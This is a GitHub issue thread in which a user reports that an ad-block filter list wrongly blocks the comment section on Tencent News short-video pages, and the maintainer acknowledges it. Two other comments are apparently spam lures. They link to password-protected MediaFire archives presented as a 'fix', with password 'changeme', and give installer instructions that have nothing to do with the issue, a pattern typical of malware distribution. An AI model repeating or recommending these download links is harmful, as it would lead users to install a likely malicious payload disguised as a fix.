### ISSUE TITLE
误杀腾讯新闻短视频评论区

### ISSUE THREAD

**Issue by damengzhu** [lingeringsound/adblock_auto#21]
### 使用的拦截器

uBlock

### 你使用的是那个规则?

混合规则精简版

### 问题描述

https://view.inews.qq.com/k/20240828V04GTA00?web_channel=wap&openApp=false
![Screenshot_2024-08-28-15-05-30-208_com kiwibrowser browser](https://github.com/user-attachments/assets/c3c6f641-7ff7-4ef8-86b3-8b542987fb0c)

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lingeringsound** [comment]
好的，感谢反馈！
